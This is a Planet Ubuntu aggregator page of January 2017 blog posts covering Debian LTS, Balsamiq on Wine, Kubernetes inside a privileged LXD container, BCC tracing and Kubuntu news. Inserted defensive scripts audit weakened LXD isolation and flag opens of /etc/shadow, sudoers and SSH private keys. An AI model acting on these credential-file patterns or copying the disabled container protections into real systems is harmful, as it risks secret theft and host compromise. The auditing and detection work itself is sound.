Planet Ubuntu

Planet Ubuntu - http://planet.ubuntu.com/

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, December 2016

Mon, 01/16/2017 - 07:39

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In December, about 175 work hours have been dispatched among 14 paid contributors. Their reports are available:

Evolution of the situation

The number of sponsored hours did not increase but a new silver sponsor is in the process of joining. We are only missing another silver sponsor (or two to four bronze sponsors) to reach our objective of funding the equivalent of a full time position.

The security tracker currently lists 31 packages with a known CVE, and the dla-needed.txt file lists 27. The situation improved a little bit compared to last month.

Thanks to our sponsors

New sponsors are in bold.


Ted Gould: Presentations Updated

Sun, 01/15/2017 - 23:00

This post is mostly a mea culpa to all the folks that asked me after a presentation: “And those slides will be online?” The answer is generally “yes”, but they were in a tweet or something equally hard to find. But now I finally got to making an updated presentations page that is actually useful. Hopefully you can find the slides you are looking for there. And more importantly you can use them as a basis for your talk to a local group in your town.

As I was redoing this I thought it was a bit interesting how my title pages seem to alternate every couple of years between complex and simple. And I think I have a candidate for worst theme (though there was a close second). Also a favorite theme along with a reminder of all the fun it is to make a presentation with JessyInk.

I think that there are a couple missing that I can’t find, and also video links out on the Internet somewhere. Please drop me a line if you have any ideas, suggestions or I sent you files that I’ve now lost. Hopefully this is easier to maintain now so there won’t be the same delay.

Valorie Zimmerman: Google Code-in draws to a close -- students finish your final task by January 16, 2017 at 09:00 (PST)

Sat, 01/14/2017 - 22:04
KDE's Google Code-in party is ending once again. Student work submitted deadline is January 16, 2017 at 09:00 (PST). 

Mentors, you have until January 18, 2017 at 09:00 (PST) to evaluate your student's work. Please get that done before the deadline, so that admins don't have to judge the student work.

Then it will be time to choose winners. We need to have our choices in by January 23, 2017 at 09:00 (PST). Winners and Finalists will be announced January 30, 2017 at 09:00 (PST).

To me, this contest has been lovely. Because there are more organizations participating now, there are more tasks for students, and less pressure on each org. It seems that the students have enjoyed themselves as well.

Spencerb said, in #kde-soc, "This was my first (and final) gci, so I don't have much of a point of comparison, but it's been awesome. It's been an opportunity to meet new people and just get involved with KDE, which I've wanted to do for a long time. I've also learned a lot about serious software development that I wouldn't have otherwise.

"I'll turn 18 this Monday, which is why this is my last year :(  I'm so glad to have had the chance to participate at least once."

As a task, Harpreet filed a GCi review: http://aboutgci2016.blogspot.in/

So far, we've had 121 students. The top ten have 103 completed tasks so far! And 160 tasks completed so far. Most exciting for me: 45 Beginner tasks were completed. Getting kids acquainted with Free and Open Source Software communities is why every organization must have beginner tasks. I'm glad 45 kids got to know KDE a bit.


Mattia Migliorini: Install Balsamiq Mockups in Debian/Ubuntu

Sat, 01/14/2017 - 02:16

Balsamiq is one of the best tools for quick wireframes creation. It allows you to efficiently and quickly create mockups that give you an idea of how design elements fit in the page.

Some years ago there was a package available for the most popular Linux distributions, but since Adobe dropped support for Linux and Balsamiq is built on top of Adobe Air, nowadays they don’t support Linux either.

As you can see from the downloads page of Balsamiq, though, it luckily works well with wine.

Install Balsamiq with WINE

First things first: install wine.

sudo apt-get install wine

Now, let’s proceed with an easy step-by-step guide.

  1. Download the Balsamiq Bundle that includes Adobe Air (if the link does not work, head on to Balsamiq Downloads and download the version With Adobe Air bundled)
  2. Open a terminal, unzip the bundle and move it to /opt (change the Downloads directory name according to your setup):

     cd Downloads
     unzip Balsamiq*
     sudo mv Balsamiq* /opt

  3. To make life easier, rename the .exe to simply balsamiq.exe:

     cd /opt/Balsamiq_Mockups_3/
     mv Balsamiq\ Mockups\ 3.exe balsamiq.exe

  4. Now you can run Balsamiq Mockups by running it with wine:

     wine /opt/Balsamiq_Mockups_3/balsamiq.exe

Add Balsamiq as an application

The last optional step can save you a lot of time in launching Balsamiq, because it saves you the hassle of writing the command in point 4 above every time you want to launch it (and remembering the Balsamiq executable location). This simply consists in creating a new desktop entry for Balsamiq, which will add it to the applications list of your operating system.

Create the file ~/.local/share/applications/Balsamiq.desktop with the following content:

[Desktop Entry]
Encoding=UTF-8
Name=Balsamiq Mockups
Icon=/opt/Balsamiq_Mockups_3/icons/mockups_ico_48.png
Exec=wine /opt/Balsamiq_Mockups_3/balsamiq.exe
Type=Application
Categories=Graphics;
MimeType=application/x-xdg-protocol-tg;x-scheme-handler/tg;

If you are on Ubuntu with Unity, you can add the following lines too:

StartupNotify=false
StartupWMClass=balsamiq.exe
X-UnityGenerated=true

Now, just save and have a look at your Dash or Activity Panel to see if it works.
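An added check, not from the original post: the MimeType line above registers the entry for the tg: URL scheme (x-scheme-handler/tg), which has nothing to do with Balsamiq and can make this entry a candidate handler for tg: links on your desktop. The POSIX sh script below lists the URL schemes a .desktop file claims and tells you whether its Exec line would even receive a URL (a %u or %U field code). The function names are mine, and the sample entry is a constructed copy of the one above, written to a temporary file so the script runs on its own.

```shell
#!/bin/sh
# Added example, not from the original post: list the URL schemes and MIME
# types a .desktop entry registers for, so that an entry copied from another
# application does not silently become a URL handler. POSIX sh + awk.

# desktop_scheme_handlers FILE: print one scheme per line taken from the
# x-scheme-handler/<scheme> entries of the MimeType= key; ordinary MIME types
# are ignored.
desktop_scheme_handlers() {
    awk -F= '
        /^MimeType=/ {
            n = split($2, types, ";")
            for (i = 1; i <= n; i++)
                if (sub(/^x-scheme-handler\//, "", types[i]) && types[i] != "")
                    print types[i]
        }' "$1"
}

# desktop_exec_takes_url FILE: succeed if Exec= carries a %u/%U field code,
# i.e. the program would actually be handed the URL it is registered for.
desktop_exec_takes_url() {
    grep -q '^Exec=.*%[uU]' "$1"
}

# Constructed copy of the entry from the post, written to a temp file.
SAMPLE_ENTRY=$(mktemp)
cat > "$SAMPLE_ENTRY" <<'EOF'
[Desktop Entry]
Encoding=UTF-8
Name=Balsamiq Mockups
Icon=/opt/Balsamiq_Mockups_3/icons/mockups_ico_48.png
Exec=wine /opt/Balsamiq_Mockups_3/balsamiq.exe
Type=Application
Categories=Graphics;
MimeType=application/x-xdg-protocol-tg;x-scheme-handler/tg;
EOF

# The same entry with the MimeType line dropped: registers no handlers.
SAFE_ENTRY=$(mktemp)
grep -v '^MimeType=' "$SAMPLE_ENTRY" > "$SAFE_ENTRY"

# Usage on a live system, after installing the entry:
#   desktop_scheme_handlers ~/.local/share/applications/Balsamiq.desktop
#   xdg-mime query default x-scheme-handler/tg   # which app handles tg: links now?
```

If the scheme list is not empty for an application that has no business opening URLs, delete the MimeType line (as in the SAFE_ENTRY variant) before running update-desktop-database.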

Install Balsamiq Mockups with Play on Linux

Eric suggests the use of Play on Linux for an easier installation process and reports that for him Balsamiq Mockups 3 works like a charm in that environment. Worth a try!

The post Install Balsamiq Mockups in Debian/Ubuntu appeared first on deshack.

Ted Gould: The Case for Ubuntu Phone

Fri, 01/13/2017 - 23:00

There are times in standard social interactions where people ask what you do professionally, which means I end up talking about Ubuntu and specifically Ubuntu Phone. Many times that comes down to the seemingly simple question: “Why would I want an Ubuntu phone?” I’ve tried the answer “because I’m a thought leader and you should want to be like me,” but sadly that gets little traction outside of Silicon Valley. Another good answer is all the benefits of Free Software, but many of those are benefits the general public doesn’t yet realize they need.

The biggest strength and weakness of Ubuntu Phone is that it’s a device without an intrinsic set of services. If you buy an Android device you get Google Services. If you buy an iPhone you get Apple services. While these can be strengths (at least in Google’s case) they are effectively a lock-in to services that may or may not meet your requirements. You certainly can get Telegram or Signal for either of those, but they’re never going to be as integrated as Hangouts or iMessage. This goes throughout the device, including things like music and storage as well. Ubuntu and Canonical don’t provide those services, but instead provide integration points for any of them (including Apple and Google if they wanted) to work inside an Ubuntu Phone. This means as a user you can use the services you want on your device; if you love Hangouts and Apple Maps, Ubuntu Phone is happy to be a freak with you.

Carriers are also interested in this flexibility. They’re trying to put together packages of data and services that will sell, and fetch a premium price (effectively bundling). Some they may provide themselves and some by well known providers; but by not being able to select options for those base services they have less flexibility on what they can do. Sure, Google and Apple could give them a great price or bundle, but they both realize that they don’t have to. So that effectively makes it difficult for the carriers as well as alternate service providers (e.g. Dropbox, Spotify, etc) to compete.

What I find most interesting about this discussion is that it is the original reason that Google bought Android. They were concerned that with Apple controlling the smartphone market they’d be in a position to damage Google’s ability to compete in services. They were right. But instead of opening it up to competition (a competition that certainly at the time and even today they’re likely to win) they decided to lock down Android with their own services. So now we see in places like China, where Google services are limited, that there is no way for Android to win, only forks that use a different set of integrations. One has to wonder whether Google would have bought Android if Ubuntu Phone had existed earlier: while Ubuntu Phone competes with Android, it doesn’t pose any threat to Google’s core businesses.

It is always a failure to try and convince people to change their patterns and devices just for the sake of change. Early adopters are people who enjoy that, but not the majority of people. This means that we need to be an order of magnitude better, which is a pretty high bar to set, but one I enjoy working towards. I think that Ubuntu Phone has the fundamental DNA to win in this race.

Stéphane Graber: Running Kubernetes inside LXD

Fri, 01/13/2017 - 03:35

Introduction

For those who haven’t heard of Kubernetes before, it’s defined by the upstream project as:

Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.

It groups containers that make up an application into logical units for easy management and discovery. Kubernetes builds upon 15 years of experience of running production workloads at Google, combined with best-of-breed ideas and practices from the community.

It is important to note the “applications” part in there. Kubernetes deploys a set of single application containers and connects them together. Those containers will typically run a single process and so are very different from the full system containers that LXD itself provides.

This blog post will be very similar to one I published last year on running OpenStack inside a LXD container. Similarly to the OpenStack deployment, we’ll be using conjure-up to setup a number of LXD containers and eventually run the Docker containers that are used by Kubernetes.

Requirements

This post assumes you’ve got a working LXD setup, providing containers with network access and that you have at least 10GB of space for the containers to use and at least 4GB of RAM.

Outside of configuring LXD itself, you will also need to bump some kernel limits with the following commands:

sudo sysctl fs.inotify.max_user_instances=1048576
sudo sysctl fs.inotify.max_queued_events=1048576
sudo sysctl fs.inotify.max_user_watches=1048576
sudo sysctl vm.max_map_count=262144

Setting up the container

Similarly to OpenStack, the conjure-up deployed version of Kubernetes expects a lot more privileges and resource access than LXD would typically provide. As a result, we have to create a privileged container, with nesting enabled and with AppArmor disabled.

This means that very few of LXD’s security features will still be in effect on this container. Depending on how you feel about this, you may choose to run this on a different machine.

Note that all of this however remains better than instructions that would have you install everything directly on your host machine. If only by making it very easy to remove it all in the end.

lxc launch ubuntu:16.04 kubernetes -c security.privileged=true -c security.nesting=true -c linux.kernel_modules=ip_tables,ip6_tables,netlink_diag,nf_nat,overlay -c raw.lxc=lxc.aa_profile=unconfined
lxc config device add kubernetes mem unix-char path=/dev/mem

Then we need to add a couple of PPAs and install conjure-up, the deployment tool we’ll use to get Kubernetes going.

lxc exec kubernetes -- apt-add-repository ppa:conjure-up/next -y
lxc exec kubernetes -- apt-add-repository ppa:juju/stable -y
lxc exec kubernetes -- apt update
lxc exec kubernetes -- apt dist-upgrade -y
lxc exec kubernetes -- apt install conjure-up -y

And the last setup step is to configure LXD networking inside the container.

lxc exec kubernetes -- lxd init

Answer with the default for all questions, except for:

  • Use the “dir” storage backend (“zfs” doesn’t work in a nested container)
  • Do NOT configure IPv6 networking (conjure-up/juju don’t play well with it)
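As an added example (not part of Stéphane’s post), here is a small POSIX sh script that makes the trade-off in the launch command explicit: it checks the four sysctl limits the post raises and audits the text of lxc config show for the isolation features this container gives up (privileged mode, nesting, the unconfined AppArmor profile and the /dev/mem pass-through). The function names and the sample configuration text are my own; the sample is constructed to match the launch command above, not captured from a real container.

```shell
#!/bin/sh
# Added example, not part of the original post: audit what isolation the
# "kubernetes" container gives up, and check the kernel limits the post raises.
# POSIX sh. The audit works on the text of `lxc config show <name>`, so it can
# be run against a saved copy as well as a live container.

# Minimum sysctl values the post sets before launching the container.
REQUIRED_SYSCTLS="fs.inotify.max_user_instances=1048576
fs.inotify.max_queued_events=1048576
fs.inotify.max_user_watches=1048576
vm.max_map_count=262144"

# sysctl_ok KEY CURRENT: succeed when CURRENT is at least the minimum for KEY.
sysctl_ok() {
    required=$(printf '%s\n' "$REQUIRED_SYSCTLS" | sed -n "s/^$1=//p")
    [ -n "$required" ] && [ "$2" -ge "$required" ]
}

# check_live_sysctls: compare the running kernel's values (needs sysctl(8)).
check_live_sysctls() {
    printf '%s\n' "$REQUIRED_SYSCTLS" | while IFS='=' read -r key min; do
        sysctl_ok "$key" "$(sysctl -n "$key")" || echo "too low: $key (need >= $min)"
    done
}

# audit_lxc_config CONFIG_TEXT: print one line per isolation feature the
# configuration switches off; succeed only if none of them is.
audit_lxc_config() {
    cfg=$1
    weakened=0
    has() { printf '%s\n' "$cfg" | grep -q -- "$1"; }
    if has '^ *security\.privileged: *"true"'; then
        echo 'privileged: container root is host root (no uid/gid mapping)'
        weakened=1
    fi
    if has '^ *security\.nesting: *"true"'; then
        echo 'nesting: the container may create containers of its own'
        weakened=1
    fi
    if has 'lxc\.aa_profile *= *unconfined'; then
        echo 'apparmor: unconfined, no AppArmor mediation of container processes'
        weakened=1
    fi
    if has '^ *path: */dev/mem$'; then
        echo 'device: /dev/mem passed through, raw physical memory access'
        weakened=1
    fi
    return $weakened
}

# Constructed sample, shaped like `lxc config show kubernetes` after the
# launch command above (not captured from a real system).
SAMPLE_CONFIG='architecture: x86_64
config:
  linux.kernel_modules: ip_tables,ip6_tables,netlink_diag,nf_nat,overlay
  raw.lxc: lxc.aa_profile=unconfined
  security.nesting: "true"
  security.privileged: "true"
devices:
  mem:
    path: /dev/mem
    type: unix-char
ephemeral: false'

# Constructed sample of a container launched with default settings.
DEFAULT_CONFIG='architecture: x86_64
config:
  image.os: ubuntu
devices: {}
ephemeral: false'

# Usage against a live container: audit_lxc_config "$(lxc config show kubernetes)"
```

Run check_live_sysctls on the host and the audit on any container you keep around after the demo; a non-zero exit from the audit is the cue to either move the setup to a throwaway machine, as the post suggests, or to delete the container when you are done.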

And that’s it for the container configuration itself, now we can deploy Kubernetes!

Deploying Kubernetes with conjure-up

As mentioned earlier, we’ll be using conjure-up to deploy Kubernetes.
This is a nice, user friendly, tool that interfaces with Juju to deploy complex services.

Start it with:

lxc exec kubernetes -- sudo -u ubuntu -i conjure-up

  • Select “Kubernetes Core”
  • Then select “localhost” as the deployment target (uses LXD)
  • And hit “Deploy all remaining applications”

This will now deploy Kubernetes. The whole process can take well over an hour depending on what kind of machine you’re running this on. You’ll see all services getting a container allocated, then getting deployed and finally interconnected.

Once the deployment is done, a few post-install steps will appear. These will import some initial images, set up SSH authentication, configure networking and finally give you the IP address of the dashboard.

Interact with your new Kubernetes

We can ask juju to deploy a new kubernetes workload, in this case 5 instances of “microbot”:

ubuntu@kubernetes:~$ juju run-action kubernetes-worker/0 microbot replicas=5
Action queued with id: 1d1e2997-5238-4b86-873c-ad79660db43f

You can then grab the service address from the Juju action output:

ubuntu@kubernetes:~$ juju show-action-output 1d1e2997-5238-4b86-873c-ad79660db43f
results:
  address: microbot.10.97.218.226.xip.io
status: completed
timing:
  completed: 2017-01-13 10:26:14 +0000 UTC
  enqueued: 2017-01-13 10:26:11 +0000 UTC
  started: 2017-01-13 10:26:12 +0000 UTC

Now actually using the Kubernetes tools, we can check the state of our new pods:

ubuntu@kubernetes:~$ ./kubectl get pods
NAME                             READY     STATUS              RESTARTS   AGE
default-http-backend-w9nr3       1/1       Running             0          21m
microbot-1855935831-cn4bs        0/1       ContainerCreating   0          18s
microbot-1855935831-dh70k        0/1       ContainerCreating   0          18s
microbot-1855935831-fqwjp        0/1       ContainerCreating   0          18s
microbot-1855935831-ksmmp        0/1       ContainerCreating   0          18s
microbot-1855935831-mfvst        1/1       Running             0          18s
nginx-ingress-controller-bj5gh   1/1       Running             0          21m

After a little while, you’ll see everything’s running:

ubuntu@kubernetes:~$ ./kubectl get pods
NAME                             READY     STATUS    RESTARTS   AGE
default-http-backend-w9nr3       1/1       Running   0          23m
microbot-1855935831-cn4bs        1/1       Running   0          2m
microbot-1855935831-dh70k        1/1       Running   0          2m
microbot-1855935831-fqwjp        1/1       Running   0          2m
microbot-1855935831-ksmmp        1/1       Running   0          2m
microbot-1855935831-mfvst        1/1       Running   0          2m
nginx-ingress-controller-bj5gh   1/1       Running   0          23m

At which point, you can hit the service URL with:

ubuntu@kubernetes:~$ curl -s http://microbot.10.97.218.226.xip.io | grep hostname
<p class="centered">Container hostname: microbot-1855935831-fqwjp</p>

Running this multiple times will show you different container hostnames as you get load balanced between one of those 5 new instances.

Conclusion

Similar to OpenStack, conjure-up combined with LXD makes it very easy to deploy rather complex software in a very self-contained way.

This isn’t the kind of setup you’d want to run in a production environment, but it’s great for developers, demos and whoever wants to try those technologies without investing into hardware.

Extra information

The conjure-up website can be found at: http://conjure-up.io
The Juju website can be found at: http://www.ubuntu.com/cloud/juju

The main LXD website is at: https://linuxcontainers.org/lxd
Development happens on Github at: https://github.com/lxc/lxd
Mailing-list support happens on: https://lists.linuxcontainers.org
IRC support happens in: #lxcontainers on irc.freenode.net
Try LXD online: https://linuxcontainers.org/lxd/try-it

Jorge Castro: Fresh Kubernetes documentation available now

Tue, 01/10/2017 - 12:34

Over the past few months our team has been working real hard on the Canonical Distribution of Kubernetes. This is a pure-upstream distribution of k8s with our community’s operational expertise bundled in.

It means that we can use one set of operational code to get the same deployment on GCE, AWS, Azure, Joyent, OpenStack, and Bare Metal.

Like most young distributed systems, Kubernetes isn’t exactly famous for its ease of use, though there has been tremendous progress over the past 12 months. Our documentation on Kubernetes was nearly non-existent and it became obvious that we had to dive in there and bust it out. I’ve spent some time fixing it up and it’s been recently merged.

You can find the Official Ubuntu Guides in the “Create a cluster” section. We’re taking what I call a “sig-cluster-lifecycle” approach to this documentation – the pages are organized into lifecycle topics based on what an operator would do. So “Backups”, or “Upgrades”, instead of one big page with sections. This will allow us to grow each section based on the expertise we learn on k8s for that given task.

Over the past few months (and hopefully for Kubernetes 1.6) we will slowly be phasing out the documentation on our individual charm and layer pages to reduce duplication and move to a pure upstream workflow. 

On behalf of our team we hope you enjoy Kubernetes, and if you’re running into issues please let us know or you can find us in the Kubernetes slack channels.

The Fridge: Ubuntu Weekly Newsletter Issue 494

Tue, 01/10/2017 - 09:06

Welcome to the Ubuntu Weekly Newsletter. This is issue #494 for the week January 2 – 8, 2017, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

Kubuntu General News: Plasma 5.8.4 and KDE Frameworks 5.8.0 now available in Backports for Kubuntu 16.04 and 16.10

Mon, 01/09/2017 - 13:01

The Kubuntu Team announces the availability of Plasma 5.8.4 and KDE Frameworks 5.8.0 on Kubuntu 16.04 (Xenial) and 16.10 (Yakkety) through our Backports PPA.

Plasma 5.8.4 Announcement:
https://www.kde.org/announcements/plasma-5.8.4.php
How to get the update (in the commandline):

  1. sudo apt-add-repository ppa:kubuntu-ppa/backports
  2. sudo apt update
  3. sudo apt full-upgrade -y

If you have been testing this upgrade by using the backports-landing PPA, please remove it first before doing the upgrade to backports. Do this in the commandline:

sudo apt-add-repository --remove ppa:kubuntu-ppa/backports-landing

Please report any bugs you find on Launchpad (for packaging problems) and http://bugs.kde.org for bugs in KDE software.

Leo Arias: Call for testing: IPFS

Fri, 01/06/2017 - 08:58

Happy new year Ubunteros and Ubunteras!

If you have been following our testing days, you will know by now that our intention is to get more people contributing to Ubuntu and free software projects, and to help them get started through testing and related tasks. So, we will be making frequent calls for testing where you can contribute and learn. Educational AND fun ^_^

To start the year, I would like to invite you to test the IPFS candidate snap. IPFS is a really interesting free project for distributed storage. You can read more about it and watch a demo in the IPFS website.

We have pushed a nice snap with their latest stable version to the candidate channel in the store. But before we publish it to the stable channel we would like to get more people testing it.

You can get a clean and safe environment to test following some of the guides you'll find on the summaries of the past testing days.

Or, if you want to use your current system, you can just do:

$ sudo snap install ipfs --candidate

I have written a gist with a simple guide to get started testing it.

If you finish that successfully and still have more time, or are curious about ipfs, please continue with an exploratory testing session. The idea here is just to execute random commands, try unusual inputs and just play around.

You can get ideas from the IPFS docs.

When you are done, please send me an email with your results and any comments. And if you get stuck or have any kind of question, please don't hesitate to ask. Remember that we welcome everybody.

Colin King: BCC: a powerful front end to extended Berkeley Packet Filters

Thu, 01/05/2017 - 08:21
The BPF Compiler Collection (BCC) is a toolkit for building kernel tracing tools that leverage the functionality provided by the Linux extended Berkeley Packet Filters (BPF).

BCC allows one to write BPF programs with front-ends in Python or Lua with kernel instrumentation written in C. The instrumentation code is built into sandboxed eBPF byte code and is executed in the kernel.

The BCC github project README file provides an excellent overview and description of BCC and the various available BCC tools. Building BCC from scratch can be a bit time consuming, however, the good news is that the BCC tools are now available as a snap and so BCC can be quickly and easily installed just using:

sudo snap install --devmode bcc

There are currently over 50 BCC tools in the snap, so let's have a quick look at a few:

cachetop allows one to view the top page cache hit/miss statistics. To run this use:

sudo bcc.cachetop

The funccount tool allows one to count the number of times specific functions get called.  For example, to see how many kernel functions with the name starting with "do_" get called per second one can use:

sudo bcc.funccount "do_*" -i 1

To see how to use all the options in this tool, use the -h option:

sudo bcc.funccount -h

I've found the funccount tool to be especially useful to check on kernel activity by checking on hits on specific function names.

The slabratetop tool is useful to see the active kernel SLAB/SLUB memory allocation rates:

sudo bcc.slabratetop

If you want to see which process is opening specific files, one can snoop on open system calls using the opensnoop tool:

sudo bcc.opensnoop -T
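As an added example, not part of Colin’s post: since opensnoop prints one line per open(2), its output can feed simple detection logic. The POSIX sh/awk script below flags successful opens of a watch-list of sensitive paths and counts failed opens, which on their own can reveal a process probing for files it cannot read. The sample lines are constructed to follow the TIME(s) PID COMM FD ERR PATH column layout of bcc.opensnoop -T, not captured from a real machine; WATCHLIST and the function names are mine.

```shell
#!/bin/sh
# Added example, not from the original post: run detection logic over
# opensnoop output. The sample lines below are constructed to match the
# column layout of `bcc.opensnoop -T` (TIME(s) PID COMM FD ERR PATH); they
# were not captured from a real system. POSIX sh + awk.

# Paths whose opens are worth an alert: space-separated extended regexes.
WATCHLIST='^/etc/shadow$ ^/etc/sudoers ^/root/[.]ssh/ ^/home/[^/]+/[.]ssh/id_'

# flag_sensitive_opens: read opensnoop -T lines on stdin and print
# "pid comm path" for every successful open (ERR == 0) of a watched path.
flag_sensitive_opens() {
    awk -v watch="$WATCHLIST" '
        BEGIN { n = split(watch, pats, " ") }
        /^TIME/ { next }                     # skip the header line
        NF >= 6 && $5 == 0 {
            for (i = 1; i <= n; i++)
                if ($6 ~ pats[i]) { print $2, $3, $6; break }
        }'
}

# count_failed_opens: successful opens are not the only signal; a burst of
# failed opens (ERR != 0, e.g. EACCES = 13) can show a process probing paths.
count_failed_opens() {
    awk '/^TIME/ { next } NF >= 6 && $5 != 0 { c++ } END { print c + 0 }'
}

# Constructed sample output (not real captures).
SAMPLE_OPENSNOOP='TIME(s)       PID    COMM               FD ERR PATH
0.000000000   1021   cron                3   0 /etc/crontab
0.000412000   4410   sshd                4   0 /etc/shadow
0.000900000   4412   cat                -1   2 /etc/shadow
0.001300000   4413   backup              5   0 /root/.ssh/id_rsa
0.001500000   4414   vim                 3   0 /home/alice/.bashrc
0.002000000   4415   scp                -1  13 /etc/sudoers'

# Usage on a live system:  sudo bcc.opensnoop -T | flag_sensitive_opens
```

On the sample this reports the sshd open of /etc/shadow and the backup process reading /root/.ssh/id_rsa, and counts two failed opens; whether either is expected depends on the host, which is exactly the context the watch-list is meant to be tuned to.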

Hopefully this will give you a taste of the useful tools that are available in BCC (I have barely scratched the surface in this article).  I recommend installing the snap and giving it a try.

As it stands, BCC provides a useful mechanism to develop BPF tracing tools and I look forward to regularly updating the BCC snap as more tools are added to BCC. Kudos to Brendan Gregg for BCC!

Kubuntu Podcast News: Kubuntu-Podcast #15 – Yakkety and Kubuntu Ninjas

Thu, 01/05/2017 - 01:21

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links
  OGG
  MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing?

  • Aaron
    • Kicking Rick’s merges to the curb
    • Kubuntu Manual / Documentation
  • Rick
    • Kubuntu Party
    • Kubuntu Dojo
    • Kubuntu Manual / Documentation
  • Ovidiu
    • Projects
    • Dockerising Open Source Applications (ReviewBoard, AgileFant, FixMyStreet)
    • Adding Images to Feedburner

Sponsor: Big Blue Button

Those of you that have attended the Kubuntu parties, will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org go check out their project.

Kubuntu News Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus Sponsor: Linode


Linode, an awesome VPS with super fast SSD’s, Data connections, and top notch support. We have worked out a sponsorship for a server to build packages quicker and get to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback
  • Linode Server – 1 x LXD Containers for others to use
    • 1 Container being used by one of the packagers
    • 2 A KCI Slave node
    • With this resource we can build one tree level dependency at once, which is around 100 packages, which takes around 1 hr on average.
    • There is also enough capacity left that we can provide additional containers for Ninja’s to use packaging.
  • For Yakkety, we now have QT 5.6.1, and we got Frameworks and Plasma 5.7.2 and for applications 16.04.3 almost done for Yakkety, and were looking for testers. The team are looking forward to applications 16.08, just hoping for an upstream release to get the PIM packages.
  • For Xenial Plasma 5.7.2 has move a little further forward, but there is much to be done in backports to achieve this.
  • Kubuntu CI System – Yofel has been working hard on improving the CI system, in addition to adding Slave Nodes, thanks to Linode too.
    • The next stage was to get the Build jobs in order; this has meant we have dropped 32bit builds from the CI, but we’ll continue to provide x86 32bit builds of Kubuntu. Focusing on only 64bit builds has resolved many errors and failures.
    • They did run into an interesting error, where the Linode slave was so powerful it tried to open 20 concurrent connections to the KDE Git repo, and was promptly closed off by the 5 connection limit. A nice problem to have.
  • Yofel will continue to work on the Stable CI builds, by getting a set of working configurations. The move back to Launchpad brings many benefits but right now it’s created a lot of challenges that the team are working through.
  • 2 additional Ninjas have been added to the Team:
    • Rik Mills
    • Simon Quigley
  • Clivejo put a big shout out to the 2 new Ninjas, many thanks for the excellent work and effort.
  • As always we’re desperate for daily build and beta builds of Yakkety
  • Bug Crush Sprint required http://qa.kubuntu.co.uk/
In Show Notes

Rick doing GOOD STUFF: http://picosong.com/Dk8m/

Outro

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

Kubuntu Podcast News: Kubuntu Podcast 17

Thu, 01/05/2017 - 01:02

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links

OGG

MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing?

  • Aaron
    • Getting ready for Hurricane Matt in Florida
  • Rick
    • ???
  • Ovidiu
    • ???
Sponsor: Big Blue Button

Those of you that have attended the Kubuntu parties, will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org go check out their project.

Kubuntu News Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus Sponsor: Linode

Linode, an awesome VPS with super fast SSD’s, Data connections, and top notch support. We have worked out a sponsorship for a server to build packages quicker and get to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback
  • Clive became a Kubuntu Developer!!!
Game On 
  • The Linux Gamer interview

Questions about Gaming on Linux:

  1. Who are you and what do you do?
  2. What makes a Game developer want to bring their AAA game to Linux?
  3. Have stores like Humble Bundle and Indie Gala helped Linux gaming?
  4. Are Linux graphics drivers getting better?
  5. What are your thoughts on Vulkan?

TLG YouTube: https://www.youtube.com/user/tuxreviews

TLG Patreon: https://www.patreon.com/thelinuxgamer

Listener Feedback
  • From: Snowhog @ https://www.kubuntuforums.net/

    I just want to express my thanks for all the hard work developers and testers put into the Kubuntu/KDE/Plasma projects. So few of you; so many of us, and the “us’s” always seem to want ‘more’, and tend to, more often than not, complain about what isn’t included and what isn’t working instead of praising that which is and does.

    For me, and with very few exceptions since I first started using Kubuntu in 2007, Kubuntu has simply just worked. I am constantly amazed that such a robust and feature filled operating system is available to everyone for free (free to me). The developers and testers simply don’t receive the credit and gratitude you all have earned.

    So, again, from one of the “us’s”, THANK YOU!

    Please feel free to pass this along.
Contact Us

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

David Tomaschik: SANS Holiday Hack Challenge 2016

Thu, 01/05/2017 - 01:00
Introduction

This is my second time playing the SANS holiday hack challenge. It was a lot of fun, and probably took me about 8-10 hours over a period of 2-3 days, not including this writeup. Ironically, this writeup took me longer than actually completing the challenge – which brings me to a note about some of the examples in the writeup. Please ignore any dates or timelines you might see in screengrabs and other notes – I was so engrossed in playing that I did a terrible job of documenting as I went along, so a lot of these I went back and did a 2nd time (of course, knowing the solution made it a bit easier) so I could provide the quality of writeup I was hoping to.

Most importantly, a huge shout out to all the SANS Counter Hack guys – I can only imagine how much work goes into building an educational game like this and making the challenges realistic and engrossing. I’ve built wargames & similar apps for work, but never had to build them into a story – let alone a story that spans multiple years. I tip my hat to their dedication and success!

Part 1: A Most Curious Business Card

We start with the Dosis children again (I can’t read that name without thinking about DOCSIS, but I see no cable modems here…) who have found Santa’s bag and business card, signs of a struggle, but no Santa!

